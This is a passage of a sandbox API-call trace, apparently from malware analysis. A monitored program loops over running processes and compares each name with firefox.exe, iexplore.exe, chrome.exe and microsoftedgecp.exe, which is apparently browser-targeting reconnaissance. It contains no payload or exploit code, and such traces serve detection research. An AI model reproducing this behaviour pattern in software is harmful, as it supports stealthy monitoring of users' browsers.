lpString2="microsoftedgecp.exe") returned 1 [0220.678] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0220.679] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0220.679] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0220.679] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0220.679] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.679] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0220.679] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0220.679] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0220.680] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0220.680] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.680] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0220.680] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0220.680] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0220.680] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0220.680] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.680] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0220.681] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0220.681] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0220.681] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0220.681] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.681] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0220.681] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0220.681] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0220.681] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0220.681] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.681] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0220.682] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0220.682] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0220.682] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0220.682] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.682] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0220.682] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0220.682] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0220.682] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0220.682] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.682] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0220.683] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0220.683] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0220.683] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0220.683] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.683] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0220.684] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0220.684] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0220.684] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0220.684] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.684] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0220.684] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0220.684] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0220.684] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0220.684] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.684] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0220.685] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0220.685] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0220.685] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0220.685] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.685] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0220.685] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0220.685] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0220.685] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0220.685] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.685] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0220.686] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0220.686] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0220.686] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0220.686] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.686] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0220.688] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0220.688] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0220.688] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0220.688] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.688] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0220.689] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0220.689] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0220.689] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0220.689] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.689] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0220.690] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0220.690] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0220.690] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0220.690] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.690] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0220.690] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0220.690] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0220.690] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0220.690] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.690] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0220.691] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0220.691] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0220.691] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0220.691] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.691] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0220.691] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0220.691] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0220.691] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0220.691] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.691] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0220.692] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0220.692] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0220.692] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0220.692] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.692] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0220.692] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0220.692] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0220.693] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0220.693] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.693] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0220.693] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0220.693] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0220.693] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0220.693] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.693] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0220.694] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0220.694] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0220.694] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0220.694] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.694] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.694] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.694] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.694] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.694] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.694] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0220.763] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0220.763] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0220.763] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0220.763] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.763] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.763] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.763] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.763] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.763] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.763] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0220.764] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0220.764] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0220.764] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0220.764] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.764] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.765] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0220.765] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0220.765] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0220.765] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.765] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0220.765] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0220.765] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0220.765] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0220.765] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.765] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0220.766] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0220.766] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0220.766] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0220.766] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.766] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.766] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0220.766] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0220.767] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0220.767] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.767] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.767] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0220.767] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0220.767] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0220.767] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.767] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.768] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0220.768] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0220.768] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0220.768] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.768] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.768] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0220.768] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0220.768] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0220.768] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.768] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0220.769] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0220.769] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0220.769] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0220.769] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0220.769] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0220.769] CloseHandle (hObject=0xd4) returned 1 [0220.769] Sleep (dwMilliseconds=0x3e8) [0221.835] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0221.837] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.838] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0221.838] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0221.838] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0221.838] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0221.838] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.838] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0221.838] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0221.838] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0221.838] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0221.838] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.839] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0221.839] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0221.839] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0221.839] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.839] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.839] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0221.839] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0221.839] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0221.839] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.839] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.840] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0221.840] lstrcmpiA (lpString1="wininit.exe", 